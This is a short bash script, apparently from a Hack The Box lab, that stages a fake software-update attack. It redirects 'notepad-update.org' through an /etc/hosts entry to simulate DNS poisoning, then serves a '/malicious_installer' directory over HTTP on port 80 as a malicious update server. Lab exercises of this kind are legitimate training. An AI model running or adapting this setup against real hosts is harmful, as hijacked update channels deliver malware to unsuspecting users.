#!/bin/bash # HTB VERSION # Simulate DNS poisoning for update server echo "192.168.1.5 notepad-update.org" >> /etc/hosts python3 -m http.server 80 --directory /malicious_installer & echo "[+] Malicious update server running."